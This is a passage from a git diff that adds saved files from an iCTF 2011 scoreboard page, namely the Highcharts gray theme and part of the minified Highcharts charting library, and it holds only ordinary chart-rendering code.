p=o.getBBox();a.contextMenu("export-menu",e,p.x,p.y,j,h)};o.on("click",function(){k.apply(a,arguments)});g=f.symbol(d.symbol,d.symbolX,d.symbolY,(d.symbolSize||12)/2).align(d,true).attr(r(m, +{"stroke-width":d.symbolStrokeWidth||1,zIndex:20})).add();a.exportSVGElements.push(i,o,g)}},destroyExport:function(){var b,c;for(b=0;b<this.exportSVGElements.length;b++){c=this.exportSVGElements[b];c.onclick=c.ontouchstart=null;this.exportSVGElements[b]=c.destroy()}for(b=0;b<this.exportDivElements.length;b++){c=this.exportDivElements[b];E(c,"mouseleave");this.exportDivElements[b]=c.onmouseout=c.onmouseover=c.ontouchstart=c.onclick=null;w(c)}}});n.Renderer.prototype.symbols.exportIcon=function(b,c, +a){return["M",b-a,c+a,"L",b+a,c+a,b+a,c+a*0.5,b-a,c+a*0.5,"Z","M",b,c+a*0.5,"L",b-a*0.5,c-a/3,b-a/6,c-a/3,b-a/6,c-a,b+a/6,c-a,b+a/6,c-a/3,b+a*0.5,c-a/3,"Z"]};n.Renderer.prototype.symbols.printIcon=function(b,c,a){return["M",b-a,c+a*0.5,"L",b+a,c+a*0.5,b+a,c-a/3,b-a,c-a/3,"Z","M",b-a*0.5,c-a/3,"L",b-a*0.5,c-a,b+a*0.5,c-a,b+a*0.5,c-a/3,"Z","M",b-a*0.5,c+a*0.5,"L",b-a*0.75,c+a,b+a*0.75,c+a,b+a*0.5,c+a*0.5,"Z"]};A.prototype.callbacks.push(function(b){var c,a=b.options.exporting,f=a.buttons;if(a.enabled!== +false){for(c in f)b.addButton(f[c]);B(b,"destroy",b.destroyExport)}})})(); diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/fr.png b/ictf2011/scoreboard.ictf2011_end.info_files/fr.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/gb.png b/ictf2011/scoreboard.ictf2011_end.info_files/gb.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/gray.js b/ictf2011/scoreboard.ictf2011_end.info_files/gray.js @@ -0,0 +1,262 @@ +/** + * Gray theme for Highcharts JS + * @author Torstein Hønsi + */ + +Highcharts.theme = { + colors: ["#DDDF0D", "#7798BF", "#55BF3B", "#DF5353", "#aaeeee", "#ff0066", "#eeaaee", + "#55BF3B", "#DF5353", "#7798BF", "#aaeeee"], + chart: { + backgroundColor: { + linearGradient: [0, 0, 0, 400], + stops: [ + [0, 'rgb(62,84,130)'], + [1, 'rgb(16, 16, 20)'] + ] + }, + borderWidth: 0, + borderRadius: 15, + plotBackgroundColor: null, + plotShadow: false, + plotBorderWidth: 0 + }, + title: { + style: { + color: '#FFF', + font: '16px Lucida Grande, Lucida Sans Unicode, Verdana, Arial, Helvetica, sans-serif' + } + }, + subtitle: { + style: { + color: '#DDD', + font: '12px Lucida Grande, Lucida Sans Unicode, Verdana, Arial, Helvetica, sans-serif' + } + }, + xAxis: { + gridLineWidth: 0, + lineColor: '#999', + tickColor: '#999', + labels: { + style: { + color: '#999', + fontWeight: 'bold' + } + }, + title: { + style: { + color: '#AAA', + font: 'bold 12px Lucida Grande, Lucida Sans Unicode, Verdana, Arial, Helvetica, sans-serif' + } + } + }, + yAxis: { + alternateGridColor: null, + minorTickInterval: null, + gridLineColor: 'rgba(255, 255, 255, .1)', + lineWidth: 0, + tickWidth: 0, + labels: { + style: { + color: '#999', + fontWeight: 'bold' + } + }, + title: { + style: { + color: '#AAA', + font: 'bold 12px Lucida Grande, Lucida Sans Unicode, Verdana, Arial, Helvetica, sans-serif' + } + } + }, + legend: { + itemStyle: { + color: '#CCC' + }, + itemHoverStyle: { + color: '#FFF' + }, + itemHiddenStyle: { + color: '#333' + } + }, + labels: { + style: { + color: '#CCC' + } + }, + tooltip: { + backgroundColor: { + linearGradient: [0, 0, 0, 50], + stops: [ + [0, 'rgba(96, 96, 96, .8)'], + [1, 'rgba(16, 16, 16, .8)'] + ] + }, + borderWidth: 0, + style: { + color: '#FFF' + } + }, + + + plotOptions: { + line: { + dataLabels: { + color: '#CCC' + }, + marker: { + lineColor: '#333' + } + }, + spline: { + marker: { + lineColor: '#333' + } + }, + scatter: { + marker: { + lineColor: '#333' + } + }, + candlestick: { + lineColor: 'white' + } + }, + + toolbar: { + itemStyle: { + color: '#CCC' + } + }, + + navigation: { + buttonOptions: { + backgroundColor: { + linearGradient: [0, 0, 0, 20], + stops: [ + [0.4, '#606060'], + [0.6, '#333333'] + ] + }, + borderColor: '#000000', + symbolStroke: '#C0C0C0', + hoverSymbolStroke: '#FFFFFF' + } + }, + + exporting: { + buttons: { + exportButton: { + symbolFill: '#55BE3B' + }, + printButton: { + symbolFill: '#7797BE' + } + } + }, + + // scroll charts + rangeSelector: { + buttonTheme: { + fill: { + linearGradient: [0, 0, 0, 20], + stops: [ + [0.4, '#888'], + [0.6, '#555'] + ] + }, + stroke: '#000000', + style: { + color: '#CCC', + fontWeight: 'bold' + }, + states: { + hover: { + fill: { + linearGradient: [0, 0, 0, 20], + stops: [ + [0.4, '#BBB'], + [0.6, '#888'] + ] + }, + stroke: '#000000', + style: { + color: 'white' + } + }, + select: { + fill: { + linearGradient: [0, 0, 0, 20], + stops: [ + [0.1, '#000'], + [0.3, '#333'] + ] + }, + stroke: '#000000', + style: { + color: 'yellow' + } + } + } + }, + inputStyle: { + backgroundColor: '#333', + color: 'silver' + }, + labelStyle: { + color: 'silver' + } + }, + + navigator: { + handles: { + backgroundColor: '#666', + borderColor: '#AAA' + }, + outlineColor: '#CCC', + maskFill: 'rgba(16, 16, 16, 0.5)', + series: { + color: '#7798BF', + lineColor: '#A6C7ED' + } + }, + + scrollbar: { + barBackgroundColor: { + linearGradient: [0, 0, 0, 20], + stops: [ + [0.4, '#888'], + [0.6, '#555'] + ] + }, + barBorderColor: '#CCC', + buttonArrowColor: '#CCC', + buttonBackgroundColor: { + linearGradient: [0, 0, 0, 20], + stops: [ + [0.4, '#888'], + [0.6, '#555'] + ] + }, + buttonBorderColor: '#CCC', + rifleColor: '#FFF', + trackBackgroundColor: { + linearGradient: [0, 0, 0, 10], + stops: [ + [0, '#000'], + [1, '#333'] + ] + }, + trackBorderColor: '#666' + }, + + // special colors for some of the demo examples + legendBackgroundColor: 'rgba(48, 48, 48, 0.8)', + legendBackgroundColorSolid: 'rgb(70, 70, 70)', + dataLabelsColor: '#444', + textColor: '#E0E0E0', + maskColor: 'rgba(255,255,255,0.3)' +}; + +// Apply the theme +var highchartsOptions = Highcharts.setOptions(Highcharts.theme); diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/highcharts.js b/ictf2011/scoreboard.ictf2011_end.info_files/highcharts.js @@ -0,0 +1,176 @@ +/* + Highcharts JS v2.1.9 (2011-11-11) + + (c) 2009-2011 Torstein H?nsi + + License: www.highcharts.com/license +*/ +(function(){function sa(a,b){var c;a||(a={});for(c in b)a[c]=b[c];return a}function ja(a,b){return parseInt(a,b||10)}function Sb(a){return typeof a==="string"}function Nb(a){return typeof a==="object"}function lc(a){return typeof a==="number"}function mc(a){return Fa.log(a)/Fa.LN10}function nc(a,b){for(var c=a.length;c--;)if(a[c]===b){a.splice(c,1);break}}function K(a){return a!==Wa&&a!==null}function Ga(a,b,c){var d,e;if(Sb(b))if(K(c))a.setAttribute(b,c);else{if(a&&a.getAttribute)e=a.getAttribute(b)}else if(K(b)&& +Nb(b))for(d in b)a.setAttribute(d,b[d]);return e}function zc(a){return Object.prototype.toString.call(a)==="[object Array]"?a:[a]}function A(){var a=arguments,b,c,d=a.length;for(b=0;b<d;b++){c=a[b];if(typeof c!=="undefined"&&c!==null)return c}}function Ja(a,b){if(Pc)if(b&&b.opacity!==Wa)b.filter="alpha(opacity="+b.opacity*100+")";sa(a.style,b)}function hb(a,b,c,d,e){a=ua.createElement(a);b&&sa(a,b);e&&Ja(a,{padding:0,border:jb,margin:0});c&&Ja(a,c);d&&d.appendChild(a);return a}function yb(a,b){var c= +function(){};c.prototype=new a;sa(c.prototype,b);return c}function Ed(a,b,c,d){var e=Xa.lang;a=a;var f=isNaN(b=bb(b))?2:b;b=c===undefined?e.decimalPoint:c;d=d===undefined?e.thousandsSep:d;e=a<0?"-":"";c=String(ja(a=bb(+a||0).toFixed(f)));var g=c.length>3?c.length%3:0;return e+(g?c.substr(0,g)+d:"")+c.substr(g).replace(/(\d{3})(?=\d)/g,"$1"+d)+(f?b+bb(a-c).toFixed(f).slice(2):"")}function Fd(a){var b={left:a.offsetLeft,top:a.offsetTop};for(a=a.offsetParent;a;){b.left+=a.offsetLeft;b.top+=a.offsetTop; +if(a!==ua.body&&a!==ua.documentElement){b.left-=a.scrollLeft;b.top-=a.scrollTop}a=a.offsetParent}return b}function Gd(){this.symbol=this.color=0}function fe(a,b,c,d,e,f,g){var h=g.x;g=g.y;var i=h-a+c-25,j=g-b+d+10,m;if(i<7)i=c+h+15;if(i+a>c+e){i-=i+a-(c+e);j-=b;m=true}if(j<5){j=5;if(m&&g>=j&&g<=j+b)j=g+b-5}else if(j+b>d+f)j=d+f-b-5;return{x:i,y:j}}function Hd(a,b){var c=a.length,d;for(d=0;d<c;d++)a[d].ss_i=d;a.sort(function(e,f){var g=b(e,f);return g===0?e.ss_i-f.ss_i:g});for(d=0;d<c;d++)delete a[d].ss_i} +function Ac(a){for(var b in a){a[b]&&a[b].destroy&&a[b].destroy();delete a[b]}}function oc(a,b){Bc=A(a,b.animation)}function Id(){var a=Xa.global.useUTC;Qc=a?Date.UTC:function(b,c,d,e,f,g){return(new Date(b,c,A(d,1),A(e,0),A(f,0),A(g,0))).getTime()};id=a?"getUTCMinutes":"getMinutes";jd=a?"getUTCHours":"getHours";kd=a?"getUTCDay":"getDay";Cc=a?"getUTCDate":"getDate";Rc=a?"getUTCMonth":"getMonth";Sc=a?"getUTCFullYear":"getFullYear";Jd=a?"setUTCMinutes":"setMinutes";Kd=a?"setUTCHours":"setHours";ld= +a?"setUTCDate":"setDate";Ld=a?"setUTCMonth":"setMonth";Md=a?"setUTCFullYear":"setFullYear"}function pc(a){Tc||(Tc=hb(Tb));a&&Tc.appendChild(a);Tc.innerHTML=""}function Uc(){}function Nd(a,b){function c(p){function q(k,n){this.pos=k;this.minor=n;this.isNew=true;n||this.addLabel()}function w(k){if(k){this.options=k;this.id=k.id}return this}function x(k,n,t,r){this.isNegative=n;this.options=k;this.x=t;this.stack=r;this.alignOptions={align:k.align||(va?n?"left":"right":"center"),verticalAlign:k.verticalAlign|| +(va?"middle":n?"bottom":"top"),y:A(k.y,va?4:n?14:-6),x:A(k.x,va?n?-6:6:0)};this.textAlign=k.textAlign||(va?n?"right":"left":"center")}function V(){var k=[],n=[],t;pa=wa=null;zb=[];u(Ha,function(r){t=false;u(["xAxis","yAxis"],function(F){if(r.isCartesian&&(F==="xAxis"&&xa||F==="yAxis"&&!xa)&&(r.options[F]===o.index||r.options[F]===Wa&&o.index===0)){r[F]=I;zb.push(r);t=true}});if(!r.visible&&z.ignoreHiddenSeries)t=false;if(t){var J,E,Q,fa,ka,$;if(!xa){J=r.options.stacking;Vc=J==="percent";if(J){ka= +r.options.stack;fa=r.type+A(ka,"");$="-"+fa;r.stackKey=fa;E=k[fa]||[];k[fa]=E;Q=n[$]||[];n[$]=Q}if(Vc){pa=0;wa=99}}if(r.isCartesian){u(r.data,function(F){var O=F.x,S=F.y,aa=S<0,Eb=aa?Q:E,kb=aa?$:fa;if(pa===null)pa=wa=F[qa];if(xa)if(O>wa)wa=O;else{if(O<pa)pa=O}else if(K(S)){if(J)Eb[O]=K(Eb[O])?Eb[O]+S:S;S=Eb?Eb[O]:S;F=A(F.low,S);if(!Vc)if(S>wa)wa=S;else if(F<pa)pa=F;if(J){s[kb]||(s[kb]={});s[kb][O]||(s[kb][O]=new x(o.stackLabels,aa,O,ka));s[kb][O].setTotal(S)}}});if(/(area|column|bar)/.test(r.type)&& +!xa)if(pa>=0){pa=0;Od=true}else if(wa<0){wa=0;Pd=true}}}})}function N(k,n){var t,r;Fb=n?1:Fa.pow(10,lb(Fa.log(k)/Fa.LN10));t=k/Fb;if(!n){n=[1,2,2.5,5,10];if(o.allowDecimals===false||ca)if(Fb===1)n=[1,2,5,10];else if(Fb<=0.1)n=[1/Fb]}for(r=0;r<n.length;r++){k=n[r];if(t<=(n[r]+(n[r+1]||n[r]))/2)break}k*=Fb;return k}function ta(k){var n;n=k;Fb=A(Fb,Fa.pow(10,lb(Fa.log(Ta)/Fa.LN10)));if(Fb<1){n=W(1/Fb)*10;n=W(k*n)/n}return n}function da(){var k,n,t,r,J=o.tickInterval,E=o.tickPixelInterval;k=o.maxZoom|| +(xa&&!K(o.min)&&!K(o.max)?tb(l.smallestInterval*5,wa-pa):null);ya=R?Da:Aa;if(Ub){t=l[xa?"xAxis":"yAxis"][o.linkedTo];r=t.getExtremes();ia=A(r.min,r.dataMin);ra=A(r.max,r.dataMax)}else{ia=A(Vb,o.min,pa);ra=A(Gb,o.max,wa)}if(ca){ia=mc(ia);ra=mc(ra)}if(ra-ia<k){r=(k-ra+ia)/2;ia=Ia(ia-r,A(o.min,ia-r),pa);ra=tb(ia+k,A(o.max,ia+k),wa)}if(!Ya&&!Vc&&!Ub&&K(ia)&&K(ra)){k=ra-ia||1;if(!K(o.min)&&!K(Vb)&&Qd&&(pa<0||!Od))ia-=k*Qd;if(!K(o.max)&&!K(Gb)&&Rd&&(wa>0||!Pd))ra+=k*Rd}Ta=ia===ra?1:Ub&&!J&&E===t.options.tickPixelInterval? +t.tickInterval:A(J,Ya?1:(ra-ia)*E/ya);if(!D&&!K(o.tickInterval))Ta=N(Ta);I.tickInterval=Ta;Wc=o.minorTickInterval==="auto"&&Ta?Ta/5:o.minorTickInterval;if(D){Ba=[];J=Xa.global.useUTC;var Q=1E3/ub,fa=6E4/ub,ka=36E5/ub;E=864E5/ub;k=6048E5/ub;r=2592E6/ub;var $=31556952E3/ub,F=[["second",Q,[1,2,5,10,15,30]],["minute",fa,[1,2,5,10,15,30]],["hour",ka,[1,2,3,4,6,8,12]],["day",E,[1,2]],["week",k,[1,2]],["month",r,[1,2,3,4,6]],["year",$,null]],O=F[6],S=O[1],aa=O[2];for(t=0;t<F.length;t++){O=F[t];S=O[1];aa= +O[2];if(F[t+1])if(Ta<=(S*aa[aa.length-1]+F[t+1][1])/2)break}if(S===$&&Ta<5*S)aa=[1,2,5];F=N(Ta/S,aa);aa=new Date(ia*ub);aa.setMilliseconds(0);if(S>=Q)aa.setSeconds(S>=fa?0:F*lb(aa.getSeconds()/F));if(S>=fa)aa[Jd](S>=ka?0:F*lb(aa[id]()/F));if(S>=ka)aa[Kd](S>=E?0:F*lb(aa[jd]()/F));if(S>=E)aa[ld](S>=r?1:F*lb(aa[Cc]()/F));if(S>=r){aa[Ld](S>=$?0:F*lb(aa[Rc]()/F));n=aa[Sc]()}if(S>=$){n-=n%F;aa[Md](n)}S===k&&aa[ld](aa[Cc]()-aa[kd]()+o.startOfWeek);t=1;n=aa[Sc]();Q=aa.getTime()/ub;fa=aa[Rc]();for(ka=aa[Cc]();Q< +ra&&t<Da;){Ba.push(Q);if(S===$)Q=Qc(n+t*F,0)/ub;else if(S===r)Q=Qc(n,fa+t*F)/ub;else if(!J&&(S===E||S===k))Q=Qc(n,fa,ka+t*F*(S===E?1:7));else Q+=S*F;t++}Ba.push(Q);Xc=o.dateTimeLabelFormats[O[0]]}else{t=ta(lb(ia/Ta)*Ta);n=ta(md(ra/Ta)*Ta);Ba=[];for(t=ta(t);t<=n;){Ba.push(t);t=ta(t+Ta)}}if(!Ub){if(Ya||xa&&l.hasColumn){n=(Ya?1:Ta)*0.5;if(Ya||!K(A(o.min,Vb)))ia-=n;if(Ya||!K(A(o.max,Gb)))ra+=n}n=Ba[0];t=Ba[Ba.length-1];if(o.startOnTick)ia=n;else ia>n&&Ba.shift();if(o.endOnTick)ra=t;else ra<t&&Ba.pop(); +Ob||(Ob={x:0,y:0});if(!D&&Ba.length>Ob[qa])Ob[qa]=Ba.length}}function Ma(){var k,n;Dc=ia;Sd=ra;V();da();Hb=fb;fb=ya/(ra-ia||1);if(!xa)for(k in s)for(n in s[k])s[k][n].cum=s[k][n].total;if(!I.isDirty)I.isDirty=ia!==Dc||ra!==Sd}function za(k){k=(new w(k)).render();Pb.push(k);return k}function eb(){var k=o.title,n=o.stackLabels,t=o.alternateGridColor,r=o.lineWidth,J,E,Q=(J=l.hasRendered)&&K(Dc)&&!isNaN(Dc);E=zb.length&&K(ia)&&K(ra);ya=R?Da:Aa;fb=ya/(ra-ia||1);cc=R?X:vb;if(E||Ub){if(Wc&&!Ya)for(E=ia+ +(Ba[0]-ia)%Wc;E<=ra;E+=Wc){Wb[E]||(Wb[E]=new q(E,true));Q&&Wb[E].isNew&&Wb[E].render(null,true);Wb[E].isActive=true;Wb[E].render()}u(Ba,function($,F){if(!Ub||$>=ia&&$<=ra){Q&&mb[$].isNew&&mb[$].render(F,true);mb[$].isActive=true;mb[$].render(F)}});t&&u(Ba,function($,F){if(F%2===0&&$<ra){dc[$]||(dc[$]=new w);dc[$].options={from:$,to:Ba[F+1]!==Wa?Ba[F+1]:ra,color:t};dc[$].render();dc[$].isActive=true}});J||u((o.plotLines||[]).concat(o.plotBands||[]),function($){Pb.push((new w($)).render())})}u([mb, +Wb,dc],function($){for(var F in $)if($[F].isActive)$[F].isActive=false;else{$[F].destroy();delete $[F]}});if(r){J=X+(Oa?Da:0)+la;E=cb-vb-(Oa?Aa:0)+la;J=ga.crispLine([Za,R?X:J,R?E:ea,Ka,R?$a-Ib:J,R?E:cb-vb],r);if(La)La.animate({d:J});else La=ga.path(J).attr({stroke:o.lineColor,"stroke-width":r,zIndex:7}).add()}if(ba){J=R?X:ea;r=ja(k.style.fontSize||12);J={low:J+(R?0:ya),middle:J+ya/2,high:J+(R?ya:0)}[k.align];r=(R?ea+Aa:X)+(R?1:-1)*(Oa?-1:1)*nd+(L===2?r:0);ba[ba.isNew?"attr":"animate"]({x:R?J:r+(Oa? +Da:0)+la+(k.x||0),y:R?r-(Oa?Aa:0)+la:J+(k.y||0)});ba.isNew=false}if(n&&n.enabled){var fa,ka;n=I.stackTotalGroup;if(!n)I.stackTotalGroup=n=ga.g("stack-labels").attr({visibility:Ab,zIndex:6}).translate(X,ea).add();for(fa in s){k=s[fa];for(ka in k)k[ka].render(n)}}I.isDirty=false}function ab(k){for(var n=Pb.length;n--;)Pb[n].id===k&&Pb[n].destroy()}var xa=p.isX,Oa=p.opposite,R=va?!xa:xa,L=R?Oa?0:2:Oa?1:3,s={},o=Ca(xa?Yc:od,[ge,he,Td,ie][L],p),I=this,ba,B=o.type,D=B==="datetime",ca=B==="logarithmic", +la=o.offset||0,qa=xa?"x":"y",ya,fb,Hb,cc=R?X:vb,G,ha,na,Ra,La,pa,wa,zb,Vb,Gb,ra=null,ia=null,Dc,Sd,Qd=o.minPadding,Rd=o.maxPadding,Ub=K(o.linkedTo),Od,Pd,Vc;B=o.events;var pd,Pb=[],Ta,Wc,Fb,Ba,mb={},Wb={},dc={},qc,rc,nd,Xc,Ya=o.categories,je=o.labels.formatter||function(){var k=this.value;return Xc?Zc(Xc,k):Ta%1E6===0?k/1E6+"M":Ta%1E3===0?k/1E3+"k":!Ya&&k>=1E3?Ed(k,0):k},$c=R&&o.labels.staggerLines,ec=o.reversed,fc=Ya&&o.tickmarkPlacement==="between"?0.5:0;q.prototype={addLabel:function(){var k=this.pos, +n=o.labels,t=!(k===ia&&!A(o.showFirstLabel,1)||k===ra&&!A(o.showLastLabel,0)),r=Ya&&R&&Ya.length&&!n.step&&!n.staggerLines&&!n.rotation&&Da/Ya.length||!R&&Da/2,J=Ya&&K(Ya[k])?Ya[k]:k,E=this.label;k=je.call({isFirst:k===Ba[0],isLast:k===Ba[Ba.length-1],dateTimeLabelFormat:Xc,value:ca?Fa.pow(10,J):J});r=r&&{width:Ia(1,W(r-2*(n.padding||10)))+Ua};r=sa(r,n.style);if(E===Wa)this.label=K(k)&&t&&n.enabled?ga.text(k,0,0,n.useHTML).attr({align:n.align,rotation:n.rotation}).css(r).add(na):null;else E&&E.attr({text:k}).css(r)}, +getLabelSize:function(){var k=this.label;return k?(this.labelBBox=k.getBBox())[R?"height":"width"]:0},render:function(k,n){var t=!this.minor,r=this.label,J=this.pos,E=o.labels,Q=this.gridLine,fa=t?o.gridLineWidth:o.minorGridLineWidth,ka=t?o.gridLineColor:o.minorGridLineColor,$=t?o.gridLineDashStyle:o.minorGridLineDashStyle,F=this.mark,O=t?o.tickLength:o.minorTickLength,S=t?o.tickWidth:o.minorTickWidth||0,aa=t?o.tickColor:o.minorTickColor,Eb=t?o.tickPosition:o.minorTickPosition,kb=E.step,nb=n&&ad|| +cb,Qb;Qb=R?G(J+fc,null,null,n)+cc:X+la+(Oa?(n&&qd||$a)-Ib-X:0);nb=R?nb-vb+la-(Oa?Aa:0):nb-G(J+fc,null,null,n)-cc;if(fa){J=ha(J+fc,fa,n);if(Q===Wa){Q={stroke:ka,"stroke-width":fa};if($)Q.dashstyle=$;if(t)Q.zIndex=1;this.gridLine=Q=fa?ga.path(J).attr(Q).add(Ra):null}!n&&Q&&J&&Q.animate({d:J})}if(S){if(Eb==="inside")O=-O;if(Oa)O=-O;t=ga.crispLine([Za,Qb,nb,Ka,Qb+(R?0:-O),nb+(R?O:0)],S);if(F)F.animate({d:t});else this.mark=ga.path(t).attr({stroke:aa,"stroke-width":S}).add(na)}if(r&&!isNaN(Qb)){Qb=Qb+ +E.x-(fc&&R?fc*fb*(ec?-1:1):0);nb=nb+E.y-(fc&&!R?fc*fb*(ec?1:-1):0);K(E.y)||(nb+=ja(r.styles.lineHeight)*0.9-r.getBBox().height/2);if($c)nb+=k/(kb||1)%$c*16;if(kb)r[k%kb?"hide":"show"]();r[this.isNew?"attr":"animate"]({x:Qb,y:nb})}this.isNew=false},destroy:function(){Ac(this)}};w.prototype={render:function(){var k=this,n=k.options,t=n.label,r=k.label,J=n.width,E=n.to,Q=n.from,fa=n.value,ka,$=n.dashStyle,F=k.svgElem,O=[],S,aa,Eb=n.color;aa=n.zIndex;var kb=n.events;if(ca){Q=mc(Q);E=mc(E);fa=mc(fa)}if(J){O= +ha(fa,J);n={stroke:Eb,"stroke-width":J};if($)n.dashstyle=$}else if(K(Q)&&K(E)){Q=Ia(Q,ia);E=tb(E,ra);ka=ha(E);if((O=ha(Q))&&ka)O.push(ka[4],ka[5],ka[1],ka[2]);else O=null;n={fill:Eb}}else return;if(K(aa))n.zIndex=aa;if(F)if(O)F.animate({d:O},null,F.onGetPath);else{F.hide();F.onGetPath=function(){F.show()}}else if(O&&O.length){k.svgElem=F=ga.path(O).attr(n).add();if(kb){$=function(nb){F.on(nb,function(Qb){kb[nb].apply(k,[Qb])})};for(S in kb)$(S)}}if(t&&K(t.text)&&O&&O.length&&Da>0&&Aa>0){t=Ca({align:R&& +ka&&"center",x:R?!ka&&4:10,verticalAlign:!R&&ka&&"middle",y:R?ka?16:10:ka?6:-4,rotation:R&&!ka&&90},t);if(!r)k.label=r=ga.text(t.text,0,0).attr({align:t.textAlign||t.align,rotation:t.rotation,zIndex:aa}).css(t.style).add();ka=[O[1],O[4],A(O[6],O[1])];O=[O[2],O[5],A(O[7],O[2])];S=tb.apply(Fa,ka);aa=tb.apply(Fa,O);r.align(t,false,{x:S,y:aa,width:Ia.apply(Fa,ka)-S,height:Ia.apply(Fa,O)-aa});r.show()}else r&&r.hide();return k},destroy:function(){Ac(this);nc(Pb,this)}};x.prototype={destroy:function(){Ac(this)}, +setTotal:function(k){this.cum=this.total=k},render:function(k){var n=this.options.formatter.call(this);if(this.label)this.label.attr({text:n,visibility:ob});else this.label=l.renderer.text(n,0,0).css(this.options.style).attr({align:this.textAlign,rotation:this.options.rotation,visibility:ob}).add(k)},setOffset:function(k,n){var t=this.isNegative,r=I.translate(this.total),J=I.translate(0);J=bb(r-J);var E=l.xAxis[0].translate(this.x)+k,Q=l.plotHeight;t={x:va?t?r:r-J:E,y:va?Q-E-n:t?Q-r-J:Q-r,width:va? +J:n,height:va?n:J};this.label&&this.label.align(this.alignOptions,null,t).attr({visibility:Ab})}};G=function(k,n,t,r,J){var E=1,Q=0,fa=r?Hb:fb;r=r?Dc:ia;fa||(fa=fb);if(t){E*=-1;Q=ya}if(ec){E*=-1;Q-=E*ya}if(n){if(ec)k=ya-k;k=k/fa+r;if(ca&&J)k=Fa.pow(10,k)}else{if(ca&&J)k=mc(k);k=E*(k-r)*fa+Q}return k};ha=function(k,n,t){var r,J,E;k=G(k,null,null,t);var Q=t&&ad||cb,fa=t&&qd||$a,ka;t=J=W(k+cc);r=E=W(Q-k-cc);if(isNaN(k))ka=true;else if(R){r=ea;E=Q-vb;if(t<X||t>X+Da)ka=true}else{t=X;J=fa-Ib;if(r<ea||r> +ea+Aa)ka=true}return ka?null:ga.crispLine([Za,t,r,Ka,J,E],n||0)};if(va&&xa&&ec===Wa)ec=true;sa(I,{addPlotBand:za,addPlotLine:za,adjustTickAmount:function(){if(Ob&&!D&&!Ya&&!Ub){var k=qc,n=Ba.length;qc=Ob[qa];if(n<qc){for(;Ba.length<qc;)Ba.push(ta(Ba[Ba.length-1]+Ta));fb*=(n-1)/(qc-1);ra=Ba[Ba.length-1]}if(K(k)&&qc!==k)I.isDirty=true}},categories:Ya,getExtremes:function(){return{min:ia,max:ra,dataMin:pa,dataMax:wa,userMin:Vb,userMax:Gb}},getPlotLinePath:ha,getThreshold:function(k){if(ia>k)k=ia;else if(ra< +k)k=ra;return G(k,0,1)},isXAxis:xa,options:o,plotLinesAndBands:Pb,getOffset:function(){var k=zb.length&&K(ia)&&K(ra),n=0,t=0,r=o.title,J=o.labels,E=[-1,1,1,-1][L],Q;if(!na){na=ga.g("axis").attr({zIndex:7}).add();Ra=ga.g("grid").attr({zIndex:1}).add()}rc=0;if(k||Ub){u(Ba,function(fa){if(mb[fa])mb[fa].addLabel();else mb[fa]=new q(fa);if(L===0||L===2||{1:"left",3:"right"}[L]===J.align)rc=Ia(mb[fa].getLabelSize(),rc)});if($c)rc+=($c-1)*16}else for(Q in mb){mb[Q].destroy();delete mb[Q]}if(r&&r.text){if(!ba){ba= +I.axisTitle=ga.text(r.text,0,0,r.useHTML).attr({zIndex:7,rotation:r.rotation||0,align:r.textAlign||{low:"left",middle:"center",high:"right"}[r.align]}).css(r.style).add();ba.isNew=true}n=ba.getBBox()[R?"height":"width"];t=A(r.margin,R?5:10)}la=E*(o.offset||Xb[L]);nd=rc+(L!==2&&rc&&E*o.labels[R?"y":"x"])+t;Xb[L]=Ia(Xb[L],nd+n+E*la)},render:eb,setCategories:function(k,n){I.categories=p.categories=Ya=k;u(zb,function(t){t.translate();t.setTooltipPoints(true)});I.isDirty=true;A(n,true)&&l.redraw()},setExtremes:function(k, +n,t,r){t=A(t,true);Pa(I,"setExtremes",{min:k,max:n},function(){Vb=k;Gb=n;t&&l.redraw(r)})},setScale:Ma,setTickPositions:da,translate:G,redraw:function(){Yb.resetTracker&&Yb.resetTracker();eb();u(Pb,function(k){k.render()});u(zb,function(k){k.isDirty=true})},removePlotBand:ab,removePlotLine:ab,reversed:ec,stacks:s,destroy:function(){var k;pb(I);for(k in s){Ac(s[k]);s[k]=null}if(I.stackTotalGroup)I.stackTotalGroup=I.stackTotalGroup.destroy();u([mb,Wb,dc,Pb],function(n){Ac(n)});u([La,na,Ra,ba],function(n){n&& +n.destroy()});La=na=Ra=ba=null}});for(pd in B)Qa(I,pd,B[pd]);Ma()}function d(){var p={};return{add:function(q,w,x,V){if(!p[q]){w=ga.text(w,0,0).css(a.toolbar.itemStyle).align({align:"right",x:-Ib-20,y:ea+30}).on("click",V).attr({align:"right",zIndex:20}).add();p[q]=w}},remove:function(q){pc(p[q].element);p[q]=null}}}function e(p){function q(){var B=this.points||zc(this),D=B[0].series.xAxis,ca=this.x;D=D&&D.options.type==="datetime";var la=Sb(ca)||D,qa;qa=la?['<span style="font-size: 10px">'+(D?Zc("%A, %b %e, %Y", +ca):ca)+"</span>"]:[];u(B,function(ya){qa.push(ya.point.tooltipFormatter(la))});return qa.join("<br/>")}function w(B,D){L=xa?B:(2*L+B)/3;s=xa?D:(s+D)/2;o.translate(L,s);rd=bb(B-L)>1||bb(D-s)>1?function(){w(B,D)}:null}function x(){if(!xa){var B=l.hoverPoints;o.hide();u(da,function(D){D&&D.hide()});B&&u(B,function(D){D.setState()});l.hoverPoints=null;xa=true}}var V,N=p.borderWidth,ta=p.crosshairs,da=[],Ma=p.style,za=p.shared,eb=ja(Ma.padding),ab=N+eb,xa=true,Oa,R,L=0,s=0;Ma.padding=0;var o=ga.g("tooltip").attr({zIndex:8}).add(), +I=ga.rect(ab,ab,0,0,p.borderRadius,N).attr({fill:p.backgroundColor,"stroke-width":N}).add(o).shadow(p.shadow),ba=ga.text("",eb+ab,ja(Ma.fontSize)+eb+ab,p.useHTML).attr({zIndex:1}).css(Ma).add(o);o.hide();return{shared:za,refresh:function(B){var D,ca,la,qa=0,ya={},fb=[];la=B.tooltipPos;D=p.formatter||q;ya=l.hoverPoints;if(za){ya&&u(ya,function(Hb){Hb.setState()});l.hoverPoints=B;u(B,function(Hb){Hb.setState(Bb);qa+=Hb.plotY;fb.push(Hb.getLabelConfig())});ca=B[0].plotX;qa=W(qa)/B.length;ya={x:B[0].category}; +ya.points=fb;B=B[0]}else 